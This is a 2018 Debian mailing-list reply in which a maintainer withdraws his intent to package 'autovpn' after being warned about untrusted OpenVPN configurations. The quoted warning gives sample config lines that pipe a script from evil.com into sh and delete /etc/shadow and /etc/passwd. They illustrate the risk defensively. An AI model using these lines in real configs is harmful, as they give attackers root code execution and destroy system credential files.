To : Steve Kemp <steve@steve.org.uk>
Subject : Re: Bug#890816: ITP: autovpn -- Connect to a VPN in a country of your choice
From : Michael Meskes <meskes@debian.org>
Date : Mon, 19 Feb 2018 19:38:16 +0100
Message-id : 1519065496.2020.56.camel@debian.org
In-reply-to : <[🔎] 20180219115306.pqtbysi7ql3noc55@steve.org.uk>
References : <[🔎] 151903374360.26582.6225833500544932274.reportbug@feivel>	 <[🔎] 20180219104939.lrq4tlstqcipee4z@steve.org.uk>	 <[🔎] 1519040680.2249.78.camel@debian.org>	 <[🔎] 20180219115306.pqtbysi7ql3noc55@steve.org.uk>


>   Yes.  For example these snippets will do what you fear they will:
> 
>     script-security 2
>     up curl http://evil.com/root-me.sh | sh
>     up rm /etc/shadow
>     down rm -f /etc/passwd
I just looked into the code myself and have to say you got me
convinces. I rescind my ITP and close the report again.
Ah, would have made some things easier, but I guess I don't want to use
this program either.
Thanks.
Michael
-- 
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Meskes at (Debian|Postgresql) dot Org
Jabber: michael at xmpp dot meskes dot org
VfL Borussia! Força Barça! SF 49ers! Use Debian GNU/Linux, PostgreSQL